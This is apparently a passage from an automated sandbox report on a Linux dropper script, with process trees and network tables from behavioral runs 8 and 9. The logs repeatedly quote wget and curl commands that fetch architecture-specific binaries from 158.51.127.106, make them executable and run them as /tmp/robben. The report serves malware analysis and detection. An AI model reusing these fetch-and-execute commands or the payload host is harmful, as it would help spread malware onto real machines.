[chmod +x config-err-DncUPG download.sh robben snap-private-tmp ssh-R1FguAXtDwge systemd-private-b0e593c6607f42e8a0803a07ba0eb743-colord.service-VArqDg systemd-private-b0e593c6607f42e8a0803a07ba0eb743-ModemManager.service-oAnasi systemd-private-b0e593c6607f42e8a0803a07ba0eb743-switcheroo-control.service-Il0Ssj systemd-private-b0e593c6607f42e8a0803a07ba0eb743-systemd-logind.service-YJkB0f systemd-private-b0e593c6607f42e8a0803a07ba0eb743-systemd-resolved.service-KGrVXi systemd-private-b0e593c6607f42e8a0803a07ba0eb743-systemd-timedated.service-w7bIMg systemd-private-b0e593c6607f42e8a0803a07ba0eb743-upower.service-Pc7AYh]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/mipsel]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mipsel]
/usr/bin/cat
[cat mipsel]
/usr/bin/chmod
[chmod +x config-err-DncUPG download.sh robben snap-private-tmp ssh-R1FguAXtDwge systemd-private-b0e593c6607f42e8a0803a07ba0eb743-colord.service-VArqDg systemd-private-b0e593c6607f42e8a0803a07ba0eb743-ModemManager.service-oAnasi systemd-private-b0e593c6607f42e8a0803a07ba0eb743-switcheroo-control.service-Il0Ssj systemd-private-b0e593c6607f42e8a0803a07ba0eb743-systemd-logind.service-YJkB0f systemd-private-b0e593c6607f42e8a0803a07ba0eb743-systemd-resolved.service-KGrVXi systemd-private-b0e593c6607f42e8a0803a07ba0eb743-upower.service-Pc7AYh]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm]
/usr/bin/cat
[cat arm]
/usr/bin/chmod
[chmod +x config-err-DncUPG download.sh robben snap-private-tmp ssh-R1FguAXtDwge systemd-private-b0e593c6607f42e8a0803a07ba0eb743-colord.service-VArqDg systemd-private-b0e593c6607f42e8a0803a07ba0eb743-ModemManager.service-oAnasi systemd-private-b0e593c6607f42e8a0803a07ba0eb743-switcheroo-control.service-Il0Ssj systemd-private-b0e593c6607f42e8a0803a07ba0eb743-systemd-logind.service-YJkB0f systemd-private-b0e593c6607f42e8a0803a07ba0eb743-systemd-resolved.service-KGrVXi systemd-private-b0e593c6607f42e8a0803a07ba0eb743-upower.service-Pc7AYh]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm5]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm5]
/usr/bin/cat
[cat arm5]
/usr/bin/chmod
[chmod +x config-err-DncUPG download.sh robben snap-private-tmp ssh-R1FguAXtDwge systemd-private-b0e593c6607f42e8a0803a07ba0eb743-colord.service-VArqDg systemd-private-b0e593c6607f42e8a0803a07ba0eb743-ModemManager.service-oAnasi systemd-private-b0e593c6607f42e8a0803a07ba0eb743-switcheroo-control.service-Il0Ssj systemd-private-b0e593c6607f42e8a0803a07ba0eb743-systemd-logind.service-YJkB0f systemd-private-b0e593c6607f42e8a0803a07ba0eb743-systemd-resolved.service-KGrVXi systemd-private-b0e593c6607f42e8a0803a07ba0eb743-upower.service-Pc7AYh]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm6]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm6]
/usr/bin/cat
[cat arm6]
/usr/bin/chmod
[chmod +x config-err-DncUPG download.sh robben snap-private-tmp ssh-R1FguAXtDwge systemd-private-b0e593c6607f42e8a0803a07ba0eb743-colord.service-VArqDg systemd-private-b0e593c6607f42e8a0803a07ba0eb743-ModemManager.service-oAnasi systemd-private-b0e593c6607f42e8a0803a07ba0eb743-switcheroo-control.service-Il0Ssj systemd-private-b0e593c6607f42e8a0803a07ba0eb743-systemd-logind.service-YJkB0f systemd-private-b0e593c6607f42e8a0803a07ba0eb743-systemd-resolved.service-KGrVXi systemd-private-b0e593c6607f42e8a0803a07ba0eb743-upower.service-Pc7AYh]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm7]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm7]
/usr/bin/cat
[cat arm7]
/usr/bin/chmod
[chmod +x config-err-DncUPG download.sh robben snap-private-tmp ssh-R1FguAXtDwge systemd-private-b0e593c6607f42e8a0803a07ba0eb743-colord.service-VArqDg systemd-private-b0e593c6607f42e8a0803a07ba0eb743-ModemManager.service-oAnasi systemd-private-b0e593c6607f42e8a0803a07ba0eb743-switcheroo-control.service-Il0Ssj systemd-private-b0e593c6607f42e8a0803a07ba0eb743-systemd-logind.service-YJkB0f systemd-private-b0e593c6607f42e8a0803a07ba0eb743-systemd-resolved.service-KGrVXi systemd-private-b0e593c6607f42e8a0803a07ba0eb743-upower.service-Pc7AYh]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/spc]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/spc]
/usr/bin/cat
[cat spc]
/usr/bin/chmod
[chmod +x config-err-DncUPG download.sh robben snap-private-tmp ssh-R1FguAXtDwge systemd-private-b0e593c6607f42e8a0803a07ba0eb743-colord.service-VArqDg systemd-private-b0e593c6607f42e8a0803a07ba0eb743-ModemManager.service-oAnasi systemd-private-b0e593c6607f42e8a0803a07ba0eb743-switcheroo-control.service-Il0Ssj systemd-private-b0e593c6607f42e8a0803a07ba0eb743-systemd-logind.service-YJkB0f systemd-private-b0e593c6607f42e8a0803a07ba0eb743-systemd-resolved.service-KGrVXi systemd-private-b0e593c6607f42e8a0803a07ba0eb743-upower.service-Pc7AYh]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/sh4]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/sh4]
/usr/bin/cat
[cat sh4]
/usr/bin/chmod
[chmod +x config-err-DncUPG download.sh robben snap-private-tmp ssh-R1FguAXtDwge systemd-private-b0e593c6607f42e8a0803a07ba0eb743-colord.service-VArqDg systemd-private-b0e593c6607f42e8a0803a07ba0eb743-ModemManager.service-oAnasi systemd-private-b0e593c6607f42e8a0803a07ba0eb743-switcheroo-control.service-Il0Ssj systemd-private-b0e593c6607f42e8a0803a07ba0eb743-systemd-logind.service-YJkB0f systemd-private-b0e593c6607f42e8a0803a07ba0eb743-systemd-resolved.service-KGrVXi systemd-private-b0e593c6607f42e8a0803a07ba0eb743-upower.service-Pc7AYh]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/i586]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/i586]
/usr/bin/cat
[cat i586]
/usr/bin/chmod
[chmod +x config-err-DncUPG download.sh robben snap-private-tmp ssh-R1FguAXtDwge systemd-private-b0e593c6607f42e8a0803a07ba0eb743-colord.service-VArqDg systemd-private-b0e593c6607f42e8a0803a07ba0eb743-ModemManager.service-oAnasi systemd-private-b0e593c6607f42e8a0803a07ba0eb743-switcheroo-control.service-Il0Ssj systemd-private-b0e593c6607f42e8a0803a07ba0eb743-systemd-logind.service-YJkB0f systemd-private-b0e593c6607f42e8a0803a07ba0eb743-systemd-resolved.service-KGrVXi systemd-private-b0e593c6607f42e8a0803a07ba0eb743-upower.service-Pc7AYh]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/i686]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/i686]
/usr/bin/cat
[cat i686]
/usr/bin/chmod
[chmod +x config-err-DncUPG download.sh robben snap-private-tmp ssh-R1FguAXtDwge systemd-private-b0e593c6607f42e8a0803a07ba0eb743-colord.service-VArqDg systemd-private-b0e593c6607f42e8a0803a07ba0eb743-ModemManager.service-oAnasi systemd-private-b0e593c6607f42e8a0803a07ba0eb743-switcheroo-control.service-Il0Ssj systemd-private-b0e593c6607f42e8a0803a07ba0eb743-systemd-logind.service-YJkB0f systemd-private-b0e593c6607f42e8a0803a07ba0eb743-systemd-resolved.service-KGrVXi systemd-private-b0e593c6607f42e8a0803a07ba0eb743-upower.service-Pc7AYh]
/tmp/robben
[./robben Payload]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | | udp |
| US | 158.51.127.106:80 | | tcp |
| US | 1.1.1.1:53 | connectivity-check.ubuntu.com | udp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 1.1.1.1:53 | connectivity-check.ubuntu.com | udp |
| US | 1.1.1.1:53 | connectivity-check.ubuntu.com | udp |
| US | 91.189.91.49:80 | connectivity-check.ubuntu.com | tcp |
| US | 1.1.1.1:53 | connectivity-check.ubuntu.com | udp |
| US | 1.1.1.1:53 | connectivity-check.ubuntu.com | udp |
| US | 91.189.91.48:80 | connectivity-check.ubuntu.com | tcp |
Files
Analysis: behavioral8
Detonation Overview
Submitted
2024-08-22 21:53
Reported
2024-08-23 00:57
Platform
ubuntu2204-amd64-20240611-en
Max time kernel
95s
Max time network
387s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/robben | /tmp/download.sh | N/A |
Processes
/tmp/download.sh
[/tmp/download.sh]
/usr/bin/wget
[wget http://158.51.127.106/bins/x86_64]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/x86_64]
/usr/bin/cat
[cat x86_64]
/usr/bin/chmod
[chmod +x download.sh gdm3-config-err-n2WIav robben snap-private-tmp systemd-private-286e069599fe4ee4b357218f47fe4dfd-ModemManager.service-Ai7PQj systemd-private-286e069599fe4ee4b357218f47fe4dfd-colord.service-VsmpfT systemd-private-286e069599fe4ee4b357218f47fe4dfd-power-profiles-daemon.service-W9pYGd systemd-private-286e069599fe4ee4b357218f47fe4dfd-switcheroo-control.service-Rt2zVp systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-logind.service-O0OsZo systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-oomd.service-w523zw systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-resolved.service-WXhxau systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-timedated.service-C6yiE2 systemd-private-286e069599fe4ee4b357218f47fe4dfd-upower.service-1vj6Ar]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/mips]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mips]
/usr/bin/cat
[cat mips]
/usr/bin/chmod
[chmod +x download.sh gdm3-config-err-n2WIav robben snap-private-tmp systemd-private-286e069599fe4ee4b357218f47fe4dfd-ModemManager.service-Ai7PQj systemd-private-286e069599fe4ee4b357218f47fe4dfd-colord.service-VsmpfT systemd-private-286e069599fe4ee4b357218f47fe4dfd-power-profiles-daemon.service-W9pYGd systemd-private-286e069599fe4ee4b357218f47fe4dfd-switcheroo-control.service-Rt2zVp systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-logind.service-O0OsZo systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-oomd.service-w523zw systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-resolved.service-WXhxau systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-timedated.service-C6yiE2 systemd-private-286e069599fe4ee4b357218f47fe4dfd-upower.service-1vj6Ar]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/mipsel]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mipsel]
/usr/bin/cat
[cat mipsel]
/usr/bin/chmod
[chmod +x download.sh gdm3-config-err-n2WIav robben snap-private-tmp systemd-private-286e069599fe4ee4b357218f47fe4dfd-ModemManager.service-Ai7PQj systemd-private-286e069599fe4ee4b357218f47fe4dfd-colord.service-VsmpfT systemd-private-286e069599fe4ee4b357218f47fe4dfd-power-profiles-daemon.service-W9pYGd systemd-private-286e069599fe4ee4b357218f47fe4dfd-switcheroo-control.service-Rt2zVp systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-logind.service-O0OsZo systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-oomd.service-w523zw systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-resolved.service-WXhxau systemd-private-286e069599fe4ee4b357218f47fe4dfd-upower.service-1vj6Ar]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm]
/usr/bin/cat
[cat arm]
/usr/bin/chmod
[chmod +x download.sh gdm3-config-err-n2WIav robben snap-private-tmp systemd-private-286e069599fe4ee4b357218f47fe4dfd-ModemManager.service-Ai7PQj systemd-private-286e069599fe4ee4b357218f47fe4dfd-colord.service-VsmpfT systemd-private-286e069599fe4ee4b357218f47fe4dfd-power-profiles-daemon.service-W9pYGd systemd-private-286e069599fe4ee4b357218f47fe4dfd-switcheroo-control.service-Rt2zVp systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-logind.service-O0OsZo systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-oomd.service-w523zw systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-resolved.service-WXhxau systemd-private-286e069599fe4ee4b357218f47fe4dfd-upower.service-1vj6Ar]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm5]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm5]
/usr/bin/cat
[cat arm5]
/usr/bin/chmod
[chmod +x download.sh gdm3-config-err-n2WIav robben snap-private-tmp systemd-private-286e069599fe4ee4b357218f47fe4dfd-ModemManager.service-Ai7PQj systemd-private-286e069599fe4ee4b357218f47fe4dfd-colord.service-VsmpfT systemd-private-286e069599fe4ee4b357218f47fe4dfd-power-profiles-daemon.service-W9pYGd systemd-private-286e069599fe4ee4b357218f47fe4dfd-switcheroo-control.service-Rt2zVp systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-logind.service-O0OsZo systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-oomd.service-w523zw systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-resolved.service-WXhxau systemd-private-286e069599fe4ee4b357218f47fe4dfd-upower.service-1vj6Ar]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm6]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm6]
/usr/bin/cat
[cat arm6]
/usr/bin/chmod
[chmod +x download.sh gdm3-config-err-n2WIav robben snap-private-tmp systemd-private-286e069599fe4ee4b357218f47fe4dfd-ModemManager.service-Ai7PQj systemd-private-286e069599fe4ee4b357218f47fe4dfd-colord.service-VsmpfT systemd-private-286e069599fe4ee4b357218f47fe4dfd-power-profiles-daemon.service-W9pYGd systemd-private-286e069599fe4ee4b357218f47fe4dfd-switcheroo-control.service-Rt2zVp systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-logind.service-O0OsZo systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-oomd.service-w523zw systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-resolved.service-WXhxau systemd-private-286e069599fe4ee4b357218f47fe4dfd-upower.service-1vj6Ar]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm7]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm7]
/usr/bin/cat
[cat arm7]
/usr/bin/chmod
[chmod +x download.sh gdm3-config-err-n2WIav robben snap-private-tmp systemd-private-286e069599fe4ee4b357218f47fe4dfd-ModemManager.service-Ai7PQj systemd-private-286e069599fe4ee4b357218f47fe4dfd-colord.service-VsmpfT systemd-private-286e069599fe4ee4b357218f47fe4dfd-power-profiles-daemon.service-W9pYGd systemd-private-286e069599fe4ee4b357218f47fe4dfd-switcheroo-control.service-Rt2zVp systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-logind.service-O0OsZo systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-oomd.service-w523zw systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-resolved.service-WXhxau systemd-private-286e069599fe4ee4b357218f47fe4dfd-upower.service-1vj6Ar]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/spc]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/spc]
/usr/bin/cat
[cat spc]
/usr/bin/chmod
[chmod +x download.sh gdm3-config-err-n2WIav robben snap-private-tmp systemd-private-286e069599fe4ee4b357218f47fe4dfd-ModemManager.service-Ai7PQj systemd-private-286e069599fe4ee4b357218f47fe4dfd-colord.service-VsmpfT systemd-private-286e069599fe4ee4b357218f47fe4dfd-power-profiles-daemon.service-W9pYGd systemd-private-286e069599fe4ee4b357218f47fe4dfd-switcheroo-control.service-Rt2zVp systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-logind.service-O0OsZo systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-oomd.service-w523zw systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-resolved.service-WXhxau systemd-private-286e069599fe4ee4b357218f47fe4dfd-upower.service-1vj6Ar]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/sh4]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/sh4]
/usr/bin/cat
[cat sh4]
/usr/bin/chmod
[chmod +x download.sh gdm3-config-err-n2WIav robben snap-private-tmp systemd-private-286e069599fe4ee4b357218f47fe4dfd-ModemManager.service-Ai7PQj systemd-private-286e069599fe4ee4b357218f47fe4dfd-colord.service-VsmpfT systemd-private-286e069599fe4ee4b357218f47fe4dfd-power-profiles-daemon.service-W9pYGd systemd-private-286e069599fe4ee4b357218f47fe4dfd-switcheroo-control.service-Rt2zVp systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-logind.service-O0OsZo systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-oomd.service-w523zw systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-resolved.service-WXhxau systemd-private-286e069599fe4ee4b357218f47fe4dfd-upower.service-1vj6Ar]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/i586]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/i586]
/usr/bin/cat
[cat i586]
/usr/bin/chmod
[chmod +x download.sh gdm3-config-err-n2WIav robben snap-private-tmp systemd-private-286e069599fe4ee4b357218f47fe4dfd-ModemManager.service-Ai7PQj systemd-private-286e069599fe4ee4b357218f47fe4dfd-colord.service-VsmpfT systemd-private-286e069599fe4ee4b357218f47fe4dfd-power-profiles-daemon.service-W9pYGd systemd-private-286e069599fe4ee4b357218f47fe4dfd-switcheroo-control.service-Rt2zVp systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-logind.service-O0OsZo systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-oomd.service-w523zw systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-resolved.service-WXhxau systemd-private-286e069599fe4ee4b357218f47fe4dfd-upower.service-1vj6Ar]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/i686]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/i686]
/usr/bin/cat
[cat i686]
/usr/bin/chmod
[chmod +x download.sh gdm3-config-err-n2WIav robben snap-private-tmp systemd-private-286e069599fe4ee4b357218f47fe4dfd-ModemManager.service-Ai7PQj systemd-private-286e069599fe4ee4b357218f47fe4dfd-colord.service-VsmpfT systemd-private-286e069599fe4ee4b357218f47fe4dfd-power-profiles-daemon.service-W9pYGd systemd-private-286e069599fe4ee4b357218f47fe4dfd-switcheroo-control.service-Rt2zVp systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-logind.service-O0OsZo systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-oomd.service-w523zw systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-resolved.service-WXhxau systemd-private-286e069599fe4ee4b357218f47fe4dfd-upower.service-1vj6Ar]
/tmp/robben
[./robben Payload]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | | udp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
| US | 158.51.127.106:80 | | tcp |
Analysis: behavioral9
Detonation Overview
Submitted
2024-08-22 21:53
Reported
2024-08-23 00:57
Platform
ubuntu2404-amd64-20240523-en
Max time kernel
92s
Max time network
590s
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/robben | /tmp/download.sh | N/A |
Processes
/tmp/download.sh
[/tmp/download.sh]
/usr/bin/wget
[wget http://158.51.127.106/bins/x86_64]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/x86_64]
/usr/bin/cat
[cat x86_64]
/usr/bin/chmod
[chmod +x download.sh gdm3-config-err-6vKEXU gdm3-config-err-75peOg robben snap-private-tmp systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-ModemManager.service-kHviKP systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-colord.service-mDLQqd systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-polkit.service-BSaoYq systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-power-profiles-daemon.service-T1PveH systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-switcheroo-control.service-JN2eQG systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-logind.service-p3auxv systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-oomd.service-6VmU2D systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-resolved.service-IfRMP1 systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-timedated.service-sYHQTy systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-upower.service-i2ODYz]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/mips]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mips]
/usr/bin/cat
[cat mips]
/usr/bin/chmod
[chmod +x download.sh gdm3-config-err-6vKEXU gdm3-config-err-75peOg robben snap-private-tmp systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-ModemManager.service-kHviKP systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-colord.service-mDLQqd systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-polkit.service-BSaoYq systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-power-profiles-daemon.service-T1PveH systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-switcheroo-control.service-JN2eQG systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-logind.service-p3auxv systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-oomd.service-6VmU2D systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-resolved.service-IfRMP1 systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-upower.service-i2ODYz]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/mipsel]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mipsel]
/usr/bin/cat
[cat mipsel]
/usr/bin/chmod
[chmod +x download.sh gdm3-config-err-6vKEXU gdm3-config-err-75peOg robben snap-private-tmp systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-ModemManager.service-kHviKP systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-colord.service-mDLQqd systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-polkit.service-BSaoYq systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-power-profiles-daemon.service-T1PveH systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-switcheroo-control.service-JN2eQG systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-logind.service-p3auxv systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-oomd.service-6VmU2D systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-resolved.service-IfRMP1 systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-upower.service-i2ODYz]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm]
/usr/bin/cat
[cat arm]
/usr/bin/chmod
[chmod +x download.sh gdm3-config-err-6vKEXU gdm3-config-err-75peOg robben snap-private-tmp systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-ModemManager.service-kHviKP systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-colord.service-mDLQqd systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-polkit.service-BSaoYq systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-power-profiles-daemon.service-T1PveH systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-switcheroo-control.service-JN2eQG systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-logind.service-p3auxv systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-oomd.service-6VmU2D systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-resolved.service-IfRMP1 systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-upower.service-i2ODYz]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm5]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm5]
/usr/bin/cat
[cat arm5]
/usr/bin/chmod
